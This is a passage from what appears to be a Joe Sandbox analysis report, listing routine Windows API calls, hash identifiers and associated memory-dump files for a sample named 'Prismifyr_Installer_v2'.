                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3356406503-0
                                                                                                                                                                                                                          • Opcode ID: 8c6ae37f0c00b40db9a7f0b8771259aad396ca2ebfe9c6ecab15c5ec5bd387db
                                                                                                                                                                                                                          • Instruction ID: 1206e07bb255176646816810ef0290bee69920d7ecde6c9ccbb84b14c6b4306b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c6ae37f0c00b40db9a7f0b8771259aad396ca2ebfe9c6ecab15c5ec5bd387db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E311A771D10205EBDF14DFA4CA585AE77B4EF44348B20843FE505B72C0D6B89A41EB5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: be076caaca7df3d109edefedbdc7bfa3a965653d784c315eb79774cf5cfe89e5
                                                                                                                                                                                                                          • Instruction ID: ea42f58d7670a619ed9131e80823b54190387dbc53765a55c310ef4228f9fff3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be076caaca7df3d109edefedbdc7bfa3a965653d784c315eb79774cf5cfe89e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF0128316202109BE7095B789E04B2A3798E710315F10463FF855F62F1D6B8CC829B5C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405405
                                                                                                                                                                                                                            • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 00405451
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2896919175-0
                                                                                                                                                                                                                          • Opcode ID: a1f8c397b5266fa352d60afbf9b4c77fa9abc53c67a054b05b22dcb893a39c3f
                                                                                                                                                                                                                          • Instruction ID: 7813e2a1ccdf537c56c01956b79198a0443dbd649336f33e6835a7e221d2fb99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1f8c397b5266fa352d60afbf9b4c77fa9abc53c67a054b05b22dcb893a39c3f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF090B25406009BE7015B549D01BAB7760EFD431AF05443EFF89B22E0D77948928E6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                                                          • Opcode ID: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                                                          • Instruction ID: fc8c1c2e7d4a5a8f9e35cd12a8e681b154a8316ed36a6d041aa31def844ca7e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61E01A72E082008FE724ABA5AA495AD77B4EB90365B20847FE211F11D1DA7858819F6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                            • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                            • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                            • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          • Opcode ID: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                                                          • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,004DF000,00000000,76233420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1100898210-0
                                                                                                                                                                                                                          • Opcode ID: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                                                          • Instruction ID: 228f896298dd83b048f64e6024dd5859bf02c68f9830d759f3998b57695c5827
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E0C2334122205BC6215F04ED08B5A776CAF49B32F15407AFA807B2A087B81C928FC8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                          • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                                                                                          APIs
